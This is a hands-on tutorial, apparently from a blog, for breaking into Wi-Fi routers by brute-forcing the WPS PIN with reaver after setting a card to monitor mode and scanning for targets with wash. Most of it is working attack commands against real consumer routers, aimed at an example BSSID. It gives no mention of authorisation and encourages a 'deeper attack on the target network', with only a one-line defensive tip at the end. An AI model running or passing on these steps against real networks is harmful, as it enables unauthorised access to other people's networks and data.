WPS is a known vulnerability of some routers. A short clip from reaver-wps wiki describing WPS attack:
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum. Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.
Enable wireless card monitor mode
First, we need a packet injection capable wireless card. To determine if you’re card is capable of packet injection, you can check out the tutorial at Aircrack-ng’s website since it is out of scope for this tutorial.
Assuming you have a capable card, let’s switch it from managed to monitor mode. Kill all processes that can interrupt monitor mode:
# airmon-ng check kill
Enable monitor mode:
# airmon-ng start wlan0
If you don’t know which interface your wireless card is, issue the command
ip addr show. Wireless interfaces are marked
IEEE 802.11bgn. Your wireless card would probably be named
wlan0 or something similar.
Airmon will create a new interface called
wlan0mon, wich is your
wlan0 but in monitor mode.
Find a vulnerable AP (access point/router)
We will use
wash command to find a WPS vulnerable access point.
# wash -i wlan0mon
If you encoutner
[!] Found packet with bad FCS, skipping... error, try:
# wash -i wlan0mon --ignore-fcs
Wash will then show APs with WPS enabled. Now if you see a
WPS Locked with
No value, that means the AP is WPS vulnerable.
Select your target AP and take note of its BSSID and Channel.
Launch the attack
Now that we have the valuable data of our target AP, we can proceed on launching the attack:
reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv
-a tells reaver to automatically adjust base on the target’s behaviour, and
-vv is for verbosity. Check
reaver --help for more options.
Some wireless cards, like the Alfa AWUS036NH I used, encounter an association error. You can fix this by opening another terminal and do the association with:
# aireplay-ng -1 0 -a <BSSID> <interface>
Then modify your reaver command by adding
-A argument, meaning that the association is done in a separate process:
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A
Another thing to look out for is when you get M5 right away and get a timeout error when sending the M6 message. It might be that the target AP indeed has WPS enbled but is not configured. Don’t waste your time on this AP, I’ve tried it and reaver will never get the PIN. See the discussion here.
If you’re receiving NACK messages, it means AP is responding to WPS requests as expected.
Patience is a virtue
It will take around 10 hours or even days depending on the signal strength for reaver to crack the PIN. The good thing is you can pause reaver (Ctrl+C) and resume the attack in another time. You can leave Reaver running during the night if you wish.
Once Reaver has cracked the PIN, it will show the PSK of the AP. You can now connect to it and perform a deeper attack on the target network.
To prevent this kind of attack, disable WPS on your routers or don’t use routers with WPS at all.